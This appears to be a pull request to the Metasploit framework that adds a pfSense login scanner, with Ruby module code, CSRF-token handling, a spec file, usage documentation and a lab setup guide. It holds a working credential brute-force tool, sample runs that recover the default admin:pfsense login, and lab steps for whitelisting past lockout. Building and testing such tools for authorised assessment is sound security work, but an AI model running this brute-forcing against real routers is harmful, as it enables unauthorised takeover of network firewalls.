### PR TITLE
Add pfSense Login Scanner module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/pfsense_login.md
+++ b/documentation/modules/auxiliary/scanner/http/pfsense_login.md
@@ -1,0 +1,106 @@
+## Vulnerable Application
+
+This module attempts to bruteforce credentials for pfSense.
+
+This module was specifically tested on version 2.7.2:
+
+**2.7.2 Download**
+
+https://atxfiles.netgate.com/mirror/downloads/
+
+Note:
+
+By default, pfSense comes with a built-in account named ```admin``` with the password being ```pfsense```.
+
+## Verification Steps
+
+1. Set up a pfSense VM using the steps above or target a real installation
+1. Start `bundle exec ./msfconsole -q`
+1. `use auxiliary/scanner/http/pfsense_login`
+1. `set ssl true`
+1. `set pass_file ...`
+1. `set user_file ...`
+1. `run`
+1. or, using some example inline options: `run pass_file=data/wordlists/default_pass_for_services_unhash.txt user_file=data/wordlists/default_pass_for_services_unhash.txt STOP_ON_SUCCESS=true SSL=true rport=443`
+1. Verify you get a login:
+```
+[+] 192.168.207.158:443 - Login Successful: admin:pfsense
+```
+
+## Options
+
+### BLANK_PASSWORD
+
+Set to `true` if an additional login attempt should be made with an empty password for every user.
+
+### BRUTEFORCE_SPEED
+
+How fast to bruteforce, from 0 to 5
+
+### PASSWORD
+
+A specific password to authenticate with
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+### STOP_ON_SUCCESS
+
+Stop guessing when a credential works for a host
+
+### THREADS
+
+The number of concurrent threads (max one per host)
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line
+
+### USER_FILE
+
+File containing usernames, one per line
+
+### VERBOSE
+
+Whether to print output for all attempts
+
+## Scenarios
+```
+msf6 auxiliary(scanner/http/pfsense_login) > options
+
+Module options (auxiliary/scanner/http/pfsense_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          pfsense          no        A specific password to authenticate with
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.207.158  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             443              yes       The target port (TCP)
+   SSL               true             no        Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
+   TARGETURI         /                yes       The base path to the pfSense application
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          admin            no        A specific username to authenticate as
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/pfsense_login) > run
+[+] 192.168.207.158:443 - Login Successful: admin:pfsense
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/lib/metasploit/framework/login_scanner/pfsense.rb
+++ b/lib/metasploit/framework/login_scanner/pfsense.rb
@@ -1,0 +1,112 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with Netgate pfSense instances.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class PfSense < HTTP
+        LOGIN_ENDPOINT = 'index.php'
+
+        # Checks if the target is pfSense. The login module should call this.
+        #
+        # @return [Boolean, String] FalseClass if target is pfSense, otherwise String
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s, LOGIN_ENDPOINT)
+          }
+          res = send_request(request_params)
+
+          if res && res.code == 200 && res.body&.include?('Login to pfSense')
+            return false
+          end
+
+          "Unable to locate \"Login to pfSense\" in body. (Is this really pfSense?)"
+        end
+
+        def query_csrf_magic
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s, LOGIN_ENDPOINT)
+          }
+
+          res = send_request(request_params)
+
+          if res.nil? || res.code != 200
+            return { status: :failure, error: 'Unknown response from GET request' }
+          end
+
+          # CSRF Magic Token and Magic Value are inlined as JavaScript in a <script> tag.
+          # It can also be extracted from the Nokogiri::HTML(res.body).search('form') form.
+          csrf_magic_token, csrf_magic_name = res.body.match(/var csrfMagicToken = "(?<magic_token>.*)";var csrfMagicName = "(?<magic_name>.*)";/).captures
+          if csrf_magic_token.nil? || csrf_magic_name.nil?
+            return { status: :failure, error: "Could not find magic CSRF values. csrf_magic_token: '#{csrf_magic_token}', csrf_magic_name: '#{csrf_magic_name}'" }
+          end
+
+          { status: :success, result: { csrf_magic_token: csrf_magic_token, csrf_magic_name: csrf_magic_name } }
+        end
+
+        # Each individual login needs their own CSRF magic header.
+        # This header comes from a GET request to the index.php page
+        def try_login(username, password, csrf_magic)
+          request_params =
+            {
+              'method' => 'POST',
+              'uri' => normalize_uri(@uri.to_s, LOGIN_ENDPOINT),
+              'keep_cookies' => true,
+              'vars_post' => {
+                'usernamefld' => username,
+                'passwordfld' => password,
+                csrf_magic[:csrf_magic_name] => csrf_magic[:csrf_magic_token],
+                'login' => ::URI.encode_www_form_component('Sign In')
+              }
+            }
+
+          { status: :success, result: send_request(request_params) }
+        end
+
+        def attempt_login(credential)
+          result_options = {
+            credential:   credential,
+            host:         @host,
+            port:         @port,
+            protocol:     'tcp',
+            service_name: 'pfsense'
+          }
+
+          # Each login needs its own csrf magic tokens
+          csrf_magic = query_csrf_magic
+
+          if csrf_magic[:status] != :success
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::UNTRIED, proof: csrf_magic[:error])
+            return Result.new(result_options)
+          end
+
+          login_result = try_login(credential.public, credential.private, csrf_magic[:result])
+
+          if login_result[:result].nil?
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+            return Result.new(result_options)
+          end
+
+          # 200 is incorrect result
+          if login_result[:result].code == 200 || login_result[:result].body.include?('Username or Password incorrect')
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::INCORRECT)
+            return Result.new(result_options)
+          end
+
+          login_status = login_result[:result].code == 302 ? ::Metasploit::Model::Login::Status::SUCCESSFUL : ::Metasploit::Model::Login::Status::INCORRECT
+          result_options.merge!(status: login_status, proof: login_result[:result])
+          Result.new(result_options)
+
+        rescue ::Rex::ConnectionError => _e
+          result_options.merge!(status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          return Result.new(result_options)
+        end
+      end
+    end
+  end
+end

--- a/lib/metasploit/framework/login_scanner/pfsense.rb
+++ b/lib/metasploit/framework/login_scanner/pfsense.rb
@@ -20,7 +20,7 @@ module Metasploit
           }
           res = send_request(request_params)
 
-          if res && res.code == 200 && res.body&.include?('Login to pfSense')
+          if res&.code == 200 && res.body&.include?('Login to pfSense')
             return false
           end
 

--- a/lib/msf_autoload.rb
+++ b/lib/msf_autoload.rb
@@ -300,7 +300,8 @@ class MsfAutoload
       'rex_ntlm' => 'RexNTLM',
       'teamcity' => 'TeamCity',
       'nist_sp_800_38f' => 'NIST_SP_800_38f',
-      'nist_sp_800_108' => 'NIST_SP_800_108'
+      'nist_sp_800_108' => 'NIST_SP_800_108',
+      'pfsense' => 'PfSense'
     }
   end
 

--- a/modules/auxiliary/scanner/http/pfsense_login.rb
+++ b/modules/auxiliary/scanner/http/pfsense_login.rb
@@ -34,8 +34,7 @@ class MetasploitModule < Msf::Auxiliary
       ], self.class
     )
 
-    options_to_deregister = ['DOMAIN']
-    deregister_options(*options_to_deregister)
+    deregister_options('DOMAIN')
   end
 
   def process_credential(credential_data)
@@ -43,8 +42,7 @@ class MetasploitModule < Msf::Auxiliary
     case credential_data[:status]
     when Metasploit::Model::Login::Status::SUCCESSFUL
       print_good "#{credential_data[:address]}:#{credential_data[:port]} - Login Successful: #{credential_combo}"
-      credential_core = create_credential(credential_data)
-      credential_data[:core] = credential_core
+      credential_data[:core] = create_credential(credential_data)
       create_credential_login(credential_data)
       return { status: :success, credential: credential_data }
     else

--- a/modules/auxiliary/scanner/http/pfsense_login.rb
+++ b/modules/auxiliary/scanner/http/pfsense_login.rb
@@ -1,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/pfsense'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Login Scanner',
+        'Description' => 'This module performs login attempts against a Netgate pfSense router webpage to bruteforce possible credentials.',
+        'Author' => [ 'sjanusz-r7' ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [],
+          'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS, SCREEN_EFFECTS, AUDIO_EFFECTS ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Msf::OptString.new('TARGETURI', [true, 'The base path to the pfSense application', '/']),
+        Opt::RPORT(443),
+      ], self.class
+    )
+
+    options_to_deregister = ['DOMAIN']
+    deregister_options(*options_to_deregister)
+  end
+
+  def process_credential(credential_data)
+    credential_combo = "#{credential_data[:username]}:#{credential_data[:private_data]}"
+    case credential_data[:status]
+    when Metasploit::Model::Login::Status::SUCCESSFUL
+      print_good "#{credential_data[:address]}:#{credential_data[:port]} - Login Successful: #{credential_combo}"
+      credential_core = create_credential(credential_data)
+      credential_data[:core] = credential_core
+      create_credential_login(credential_data)
+      return { status: :success, credential: credential_data }
+    else
+      error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      vprint_error error_msg
+      invalidate_login(credential_data)
+      return { status: :fail, credential: credential_data }
+    end
+  end
+
+  def run_scanner(scanner)
+    successful_logins = []
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+
+      processed_credential = process_credential(credential_data)
+      successful_logins << processed_credential[:credential] if processed_credential[:status] == :success
+    end
+    { successful_logins: successful_logins }
+  end
+
+  def run_host(ip)
+    cred_collection = build_credential_collection(
+      username: datastore['USERNAME'],
+      password: datastore['PASSWORD']
+    )
+
+    scanner_opts = configure_http_login_scanner(
+      host: ip,
+      uri: target_uri,
+      port: datastore['RPORT'],
+      proxies: datastore['Proxies'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+      connection_timeout: datastore['HttpClientTimeout'] || 5,
+      framework: framework,
+      framework_module: self,
+      http_success_codes: [302],
+      method: 'POST',
+      ssl: datastore['SSL']
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::PfSense.new(scanner_opts)
+    run_scanner(scanner)
+  end
+end

--- a/modules/auxiliary/scanner/http/pfsense_login.rb
+++ b/modules/auxiliary/scanner/http/pfsense_login.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         Msf::OptString.new('TARGETURI', [true, 'The base path to the pfSense application', '/']),
+        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),
         Opt::RPORT(443),
       ], self.class
     )
@@ -47,7 +48,11 @@ class MetasploitModule < Msf::Auxiliary
       create_credential_login(credential_data)
       return { status: :success, credential: credential_data }
     else
-      error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      if credential_data[:proof]
+        error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]} : #{credential_data[:proof]})"
+      else
+        error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      end
       vprint_error error_msg
       invalidate_login(credential_data)
       return { status: :fail, credential: credential_data }

--- a/spec/lib/metasploit/framework/login_scanner/pfsense_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/pfsense_spec.rb
@@ -1,0 +1,8 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/pfsense'
+
+RSpec.describe Metasploit::Framework::LoginScanner::PfSense do
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: true, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP'
+end


### PR DESCRIPTION
This PR adds a login scanner module for pfSense

The skeleton for this work was copied from the recent TeamCity login scanner implementation.

## Local pfSense setup

- Download a pfSense ISO `pfSense-CE-2.7.2-RELEASE-amd64.iso.gz` from here: https://atxfiles.netgate.com/mirror/downloads/
- Unpack the iso using `gzip -d ./pfSense-CE-2.7.2-RELEASE-amd64.iso.gz`
- Create a new VM
- Add a second network adapter to the VM (One adapter will be LAN, one will be set to WAN) -> Both can be configured as local to your machine
- Boot up the VM, and go through the standard install process. No fancy options need to be selected.
- Log into the UI, and go through the finalisation process
- You may need to configure lockout settings under `System` -> `Advanced` -> Scroll down to `Login Protection` and add `192.168.0.0` with a subnet mask of `/16` in the `Pass list` option, then click `Save`. Otherwise, your IP would get locked out (all packets get dropped) for 120 seconds after 3 failed attempts.

## Example output
<img width="784" alt="image" src="https://github.com/user-attachments/assets/7c362e8c-fbfb-4ecd-aaf1-ac9e319f14b7" />

## Logs
Each login attempt is accompanied by a pretty loud `beep` noise from the VM, as well as logs, both in the UI and in the VM screen. For example:
<img width="767" alt="image" src="https://github.com/user-attachments/assets/09cbf462-e926-47eb-ba50-626bdf5f62b6" />
<img width="1143" alt="image" src="https://github.com/user-attachments/assets/23d5f12d-ad50-4637-81f0-2db5c4cfff2e" />

## Verification

List the steps needed to make sure this thing works

- [ ] Set up a pfSense VM using the steps above
- [ ] Start `bundle exec ./msfconsole -q`
- [ ] `use auxiliary/scanner/http/pfsense_login`
- [ ] `set ssl true`
- [ ] `set pass_file ...`
- [ ] `set user_file ...`
- [ ] `run`
- [ ] or, using some example inline options: `run pass_file=data/wordlists/default_pass_for_services_unhash.txt user_file=data/wordlists/default_pass_for_services_unhash.txt STOP_ON_SUCCESS=true SSL=true rport=443`
- [ ] **Verify** you get a login!
